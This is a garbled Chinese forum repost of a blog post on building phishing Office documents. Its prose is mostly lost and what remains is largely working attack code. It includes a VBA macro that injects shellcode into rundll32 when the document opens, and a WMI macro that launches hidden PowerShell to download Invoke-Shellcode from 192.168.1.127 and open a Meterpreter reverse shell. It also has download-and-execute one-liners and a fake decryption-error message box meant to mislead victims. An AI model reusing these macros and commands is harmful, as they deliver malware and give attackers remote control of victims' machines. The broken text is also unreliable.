[21373] 2020-11-02_钓鱼文档碎碎念(一)

文档创建者:s7ckTeam
浏览次数:8
最后更新:2025-01-18
2020-11-02_钓鱼文档碎碎念(一) ( ) 鸿 a   L e m o n S e c   2 0 2 0 - 1 1 - 0 2 使 使 C o b a l t S t r i k e .   C o b a l t S t r i k e . 使 A t t a c k s   - - >   P a c k a g e s   - - >   M S   o f f i c e s   M a c r o P r i v a t e   T y p e   P R O C E S S _ I N F O R M A T I O N         h P r o c e s s   A s   L o n g         h T h r e a d   A s   L o n g         d w P r o c e s s I d   A s   L o n g         d w T h r e a d I d   A s   L o n g E n d   T y p e P r i v a t e   T y p e   S T A R T U P I N F O         c b   A s   L o n g         l p R e s e r v e d   A s   S t r i n g         l p D e s k t o p   A s   S t r i n g         l p T i t l e   A s   S t r i n g         d w X   A s   L o n g         d w Y   A s   L o n g         d w X S i z e   A s   L o n g         d w Y S i z e   A s   L o n g         d w X C o u n t C h a r s   A s   L o n g         d w Y C o u n t C h a r s   A s   L o n g
        d w Y C o u n t C h a r s   A s   L o n g         d w F i l l A t t r i b u t e   A s   L o n g         d w F l a g s   A s   L o n g         w S h o w W i n d o w   A s   I n t e g e r         c b R e s e r v e d 2   A s   I n t e g e r         l p R e s e r v e d 2   A s   L o n g         h S t d I n p u t   A s   L o n g         h S t d O u t p u t   A s   L o n g         h S t d E r r o r   A s   L o n g E n d   T y p e # I f   V B A 7   T h e n         P r i v a t e   D e c l a r e   P t r S a f e   F u n c t i o n   C r e a t e S t u f f   L i b   " k e r n e l 3 2 "   A l i a s   " C r e a t e R e m o t e T h r e a d "   ( B y V a l   h P r o c e s s   A s   L o n g ,   B y V a l   l p T h r e a d A t t r i b u t e s   A s   L o n g ,   B y V a l   d w S t a c k S i z e   A s   L o n g ,   B y V a l   l p S t a r t A d d r e s s   A s   L o n g P t r ,   l p P a r a m e t e r   A s   L o n g ,   B y V a l   d w C r e a t i o n F l a g s   A s   L o n g ,   l p T h r e a d I D   A s   L o n g )   A s   L o n g P t r         P r i v a t e   D e c l a r e   P t r S a f e   F u n c t i o n   A l l o c S t u f f   L i b   " k e r n e l 3 2 "   A l i a s   " V i r t u a l A l l o c E x "   ( B y V a l   h P r o c e s s   A s   L o n g ,   B y V a l   l p A d d r   A s   L o n g ,   B y V a l   l S i z e   A s   L o n g ,   B y V a l   f l A l l o c a t i o n T y p e   A s   L o n g ,   B y V a l   f l P r o t e c t   A s   L o n g )   A s   L o n g P t r         P r i v a t e   D e c l a r e   P t r S a f e   F u n c t i o n   W r i t e S t u f f   L i b   " k e r n e l 3 2 "   A l i a s   " W r i t e P r o c e s s M e m o r y "   ( B y V a l   h P r o c e s s   A s   L o n g ,   B y V a l   l D e s t   A s   L o n g P t r ,   B y R e f   S o u r c e   A s   A n y ,   B y V a l   L e n g t h   A s   L o n g ,   B y V a l   L e n g t h W r o t e   A s   L o n g P t r )   A s   L o n g P t r         P r i v a t e   D e c l a r e   P t r S a f e   F u n c t i o n   R u n S t u f f   L i b   " k e r n e l 3 2 "   A l i a s   " C r e a t e P r o c e s s A "   ( B y V a l   l p A p p l i c a t i o n N a m e   A s   S t r i n g ,   B y V a l   l p C o m m a n d L i n e   A s   S t r i n g ,   l p P r o c e s s A t t r i b u t e s   A s   A n y ,   l p T h r e a d A t t r i b u t e s   A s   A n y ,   B y V a l   b I n h e r i t H a n d l e s   A s   L o n g ,   B y V a l   d w C r e a t i o n F l a g s   A s   L o n g ,   l p E n v i r o n m e n t   A s   A n y ,   B y V a l   l p C u r r e n t D i r e c t o r y   A s   S t r i n g ,   l p S t a r t u p I n f o   A s   S T A R T U P I N F O ,   l p P r o c e s s I n f o r m a t i o n   A s   P R O C E S S _ I N F O R M A T I O N )   A s   L o n g # E l s e         P r i v a t e   D e c l a r e   F u n c t i o n   C r e a t e S t u f f   L i b   " k e r n e l 3 2 "   A l i a s   " C r e a t e R e m o t e T h r e a d "   ( B y V a l   h P r o c e s s   A s   L o n g ,   B y V a l   l p T h r e a d A t t r i b u t e s   A s   L o n g ,   B y V a l   d w S t a c k S i z e   A s   L o n g ,   B y V a l   l p S t a r t A d d r e s s   A s   L o n g ,   l p P a r a m e t e r   A s   L o n g ,   B y V a l   d w C r e a t i o n F l a g s   A s   L o n g ,   l p T h r e a d I D   A s   L o n g )   A s   L o n g         P r i v a t e   D e c l a r e   F u n c t i o n   A l l o c S t u f f   L i b   " k e r n e l 3 2 "   A l i a s   " V i r t u a l A l l o c E x "   ( B y V a l   h P r o c e s s   A s   L o n g ,   B y V a l   l p A d d r   A s   L o n g ,   B y V a l   l S i z e   A s   L o n g ,   B y V a l   f l A l l o c a t i o n T y p e   A s   L o n g ,   B y V a l   f l P r o t e c t   A s   L o n g )   A s   L o n g         P r i v a t e   D e c l a r e   F u n c t i o n   W r i t e S t u f f   L i b   " k e r n e l 3 2 "   A l i a s   " W r i t e P r o c e s s M e m o r y "   ( B y V a l   h P r o c e s s   A s   L o n g ,   B y V a l   l D e s t   A s   L o n g ,   B y R e f   S o u r c e   A s   A n y ,   B y V a l   L e n g t h   A s   L o n g ,   B y V a l   L e n g t h W r o t e   A s   L o n g )   A s   L o n g         P r i v a t e   D e c l a r e   F u n c t i o n   R u n S t u f f   L i b   " k e r n e l 3 2 "   A l i a s   " C r e a t e P r o c e s s A "   ( B y V a l   l p A p p l i c a t i o n N a m e   A s   S t r i n g ,   B y V a l   l p C o m m a n d L i n e   A s   S t r i n g ,   l p P r o c e s s A t t r i b u t e s   A s   A n y ,   l p T h r e a d A t t r i b u t e s   A s   A n y ,   B y V a l   b I n h e r i t H a n d l e s   A s   L o n g ,   B y V a l   d w C r e a t i o n F l a g s   A s   L o n g ,   l p E n v i r o n m e n t   A s   A n y ,   B y V a l   l p C u r r e n t D r i e c t o r y   A s   S t r i n g ,   l p S t a r t u p I n f o   A s   S T A R T U P I N F O ,   l p P r o c e s s I n f o r m a t i o n   A s   P R O C E S S _ I N F O R M A T I O N )   A s   L o n g # E n d   I f S u b   A u t o _ O p e n ( )         D i m   m y B y t e   A s   L o n g ,   m y A r r a y   A s   V a r i a n t ,   o f f s e t   A s   L o n g         D i m   p I n f o   A s   P R O C E S S _ I N F O R M A T I O N         D i m   s I n f o   A s   S T A R T U P I N F O         D i m   s N u l l   A s   S t r i n g         D i m   s P r o c   A s   S t r i n g # I f   V B A 7   T h e n         D i m   r w x p a g e   A s   L o n g P t r ,   r e s   A s   L o n g P t r
使 w o r d # E l s e         D i m   r w x p a g e   A s   L o n g ,   r e s   A s   L o n g # E n d   I f         m y A r r a y   =   A r r a y ( s h e l l c o d e )         I f   L e n ( E n v i r o n ( " P r o g r a m W 6 4 3 2 " ) )   >   0   T h e n                 s P r o c   =   E n v i r o n ( " w i n d i r " )   &   " S y s W O W 6 4 r u n d l l 3 2 . e x e "         E l s e                 s P r o c   =   E n v i r o n ( " w i n d i r " )   &   " S y s t e m 3 2 r u n d l l 3 2 . e x e "         E n d   I f         r e s   =   R u n S t u f f ( s N u l l ,   s P r o c ,   B y V a l   0 & ,   B y V a l   0 & ,   B y V a l   1 & ,   B y V a l   4 & ,   B y V a l   0 & ,   s N u l l ,   s I n f o ,   p I n f o )         r w x p a g e   =   A l l o c S t u f f ( p I n f o . h P r o c e s s ,   0 ,   U B o u n d ( m y A r r a y ) ,   & H 1 0 0 0 ,   & H 4 0 )         F o r   o f f s e t   =   L B o u n d ( m y A r r a y )   T o   U B o u n d ( m y A r r a y )                 m y B y t e   =   m y A r r a y ( o f f s e t )                 r e s   =   W r i t e S t u f f ( p I n f o . h P r o c e s s ,   r w x p a g e   +   o f f s e t ,   m y B y t e ,   1 ,   B y V a l   0 & )         N e x t   o f f s e t         r e s   =   C r e a t e S t u f f ( p I n f o . h P r o c e s s ,   0 ,   0 ,   r w x p a g e ,   0 ,   0 ,   0 ) E n d   S u b S u b   A u t o O p e n ( )         A u t o _ O p e n E n d   S u b S u b   W o r k b o o k _ O p e n ( )         A u t o _ O p e n E n d   S u b
v b p o w e r s h e l l 线 ( h t t p s : / / g i t h u b . c o m / e n i g m a 0 x 3 / P o w e r s h e l l - P a y l o a d - E x c e l - D e l i v e r y / b l o b / m a s t e r / M a c r o C o d e ) 使 w m i S u b   A u t o _ O p e n ( ) E x e c u t e P e r s i s t E n d   S u b           P u b l i c   F u n c t i o n   E x e c u t e ( )   A s   V a r i a n t                 C o n s t   H I D D E N _ W I N D O W   =   0                 s t r C o m p u t e r   =   " . "                 S e t   o b j W M I S e r v i c e   =   G e t O b j e c t ( " w i n m g m t s : "   &   s t r C o m p u t e r   &   " r o o t c i m v 2 " )                                   S e t   o b j S t a r t u p   =   o b j W M I S e r v i c e . G e t ( " W i n 3 2 _ P r o c e s s S t a r t u p " )                 S e t   o b j C o n f i g   =   o b j S t a r t u p . S p a w n I n s t a n c e _                 o b j C o n f i g . S h o w W i n d o w   =   H I D D E N _ W I N D O W                 S e t   o b j P r o c e s s   =   G e t O b j e c t ( " w i n m g m t s : "   &   s t r C o m p u t e r   &   " r o o t c i m v 2 : W i n 3 2 _ P r o c e s s " )                 o b j P r o c e s s . C r e a t e   " p o w e r s h e l l . e x e   - E x e c u t i o n P o l i c y   B y p a s s   - W i n d o w S t y l e   H i d d e n   - n o p r o f i l e   - n o e x i t   - c   I E X   ( ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 2 7 / I n v o k e - S h e l l c o d e ' ) ) ;   I n v o k e - S h e l l c o d e   - P a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p s   - L h o s t   1 9 2 . 1 6 8 . 1 . 1 2 7   - L p o r t   1 1 1 1   - F o r c e " ,   N u l l ,   o b j C o n f i g ,   i n t P r o c e s s I D           E n d   F u n c t i o n
p s i n v o k e - s h e l l c o d e d c s p s 线 s e s s i o n p o w e r s h e l l . e x e   - E x e c u t i o n P o l i c y   B y p a s s   - W i n d o w S t y l e   H i d d e n   - n o p r o f i l e   - n o e x i t   - c   I E X   ( ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 2 7 / I n v o k e - S h e l l c o d e ' ) ) ;   I n v o k e - S h e l l c o d e   - P a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p s   - L h o s t   1 9 2 . 1 6 8 . 1 . 1 2 7   - L p o r t   1 1 1 1   - F o r c e p o w e r s h e l l . e x e   - n o p   - w   h i d d e n   - c   " I E X   ( ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 2 . 1 1 4 : 8 0 1 1 / a ' ) ) " R e s u l t   =   M s g B o x ( " T h e   d o c u m e n t   c a n n o t   b e   d e c r y p t e d . " ,   v b A b o r t R e t r y I g n o r e   +   v b C r i t i c a l ,   " P l e a s e   c o n t a c t  
s h e l l c o d e p o w e r s h e l l 6 0 p o w e r s h e l l 使 线 R e s u l t   =   M s g B o x ( " T h e   d o c u m e n t   c a n n o t   b e   d e c r y p t e d . " ,   v b A b o r t R e t r y I g n o r e   +   v b C r i t i c a l ,   " P l e a s e   c o n t a c t   3 6 0 . " )
h t t p s : / / g i t h u b . c o m / e n i g m a 0 x 3 / P o w e r s h e l l - P a y l o a d - E x c e l - D e l i v e r y 2 0 2 0 h w H W D N S c t f -   - a n d r o i d L e m o n S e c 2 0 2 0 h w H W D N S c t f -   - a n d r o i d L e m o n S e c

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则